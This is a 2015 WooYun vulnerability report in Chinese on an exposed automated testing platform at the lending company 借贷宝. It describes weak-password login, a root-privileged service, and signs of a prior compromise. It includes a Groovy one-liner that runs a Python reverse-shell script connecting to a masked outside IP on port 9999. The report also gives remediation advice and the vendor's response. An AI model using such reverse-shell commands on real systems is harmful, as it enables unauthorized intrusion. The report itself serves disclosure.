漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0148094
漏洞标题:借贷宝自动化测试平台未授权访问getshell可入其他公司内网
相关厂商:借贷宝
漏洞作者: 403
提交时间:2015-10-20 17:04
修复时间:2015-12-04 18:34
公开时间:2015-12-04 18:34
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-20: 厂商已经确认,细节仅向厂商公开
2015-10-30: 细节向核心白帽子及相关领域专家公开
2015-11-09: 细节向普通白帽子公开
2015-11-19: 细节向实习白帽子公开
2015-12-04: 细节向公众公开
简要描述:
最近借贷宝推广很热啊,扫二维码注册认证就送小米充电宝,今天顺便来看看安全做得怎么样。
详细说明:
自动化测试平台:plist.jiedaibao.com:8080
1、未授权访问&弱口令
遍历用户弱口令,发现几个弱口令账户,登录:
2、启动权限太高(root权限)
执行命令查看当前用户权限,发现居然是root权限:
3、已被入侵
本想新建账号登录,可惜远程登录使用了public key,那就试试反弹连接,发现居然已经有人来过了。
4、getshell
既然已经有了back.py,那就省的自己写入了,直接反弹连接:
println "python /tmp/back.py xxx.xxx.xxx.xxx 9999".execute().text 本地监听9999端口
5、浏览内网
发现一个其他网站的页面,这个比较奇怪,怎么跟其他公司内网相通呢?求解答
漏洞证明:
如上
修复方案:
自动化测试平台禁止暴露在外网,或者限制访问IP
修改弱口令账户
启动权限不要使用ROOT权限
另外,这个平台还允许任意用户注册,一起修复一下吧
版权声明:转载请注明来源 403@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2015-10-20 18:32
厂商回复:
感谢对我们的关注,问题已修复。
该平台为一台独立服务器,并不在我们内网,影响范围较小。
最新状态:
暂无